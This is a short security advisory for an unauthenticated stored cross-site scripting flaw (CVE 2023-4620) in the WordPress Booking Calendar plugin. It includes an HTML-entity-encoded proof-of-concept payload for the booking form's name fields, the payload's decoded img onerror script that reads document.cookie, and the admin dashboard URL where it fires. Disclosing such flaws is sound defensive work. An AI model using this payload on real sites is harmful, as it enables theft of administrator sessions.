Booking Calendar < 9.7.3.1 – Unauthenticated Stored XSS | CVE 2023-4620

Description

The plugin does not sanitize and escape some of its booking from data, allowing unauthenticated users to perform Stored Cross-Site Scripting attacks against administrators

Proof of Concept

As an unauthenticated user, submit a booking form (such form can be added via the Booking Calendar Block on a page/post) with the payload below in the First or Last Name field:

&#x22;&#x3e;&#x3c;&#x69;&#x6d;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3d;&#x31;&#x20;&#x6f;&#x6e;&#x65;&#x72;&#x72;&#x6f;&#x72;&#x3d;&#x22;&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x64;&#x6f;&#x63;&#x75;&#x6d;&#x65;&#x6e;&#x74;&#x2e;&#x63;&#x6f;&#x6f;&#x6b;&#x69;&#x65;&#x29;&#x22;&#x3e;&#x3c;&#x2f;&#x69;&#x6d;&#x67;&#x3e;

Which is the HTML encoded of ><img src=1 onerror="javascript:alert(document.cookie)"></img>


The XSS will be triggered when an admin will access the calendar overview dashboard (ie /wp-admin/admin.php?page=wpbc&view_days_num=90&view_mode=vm_calendar)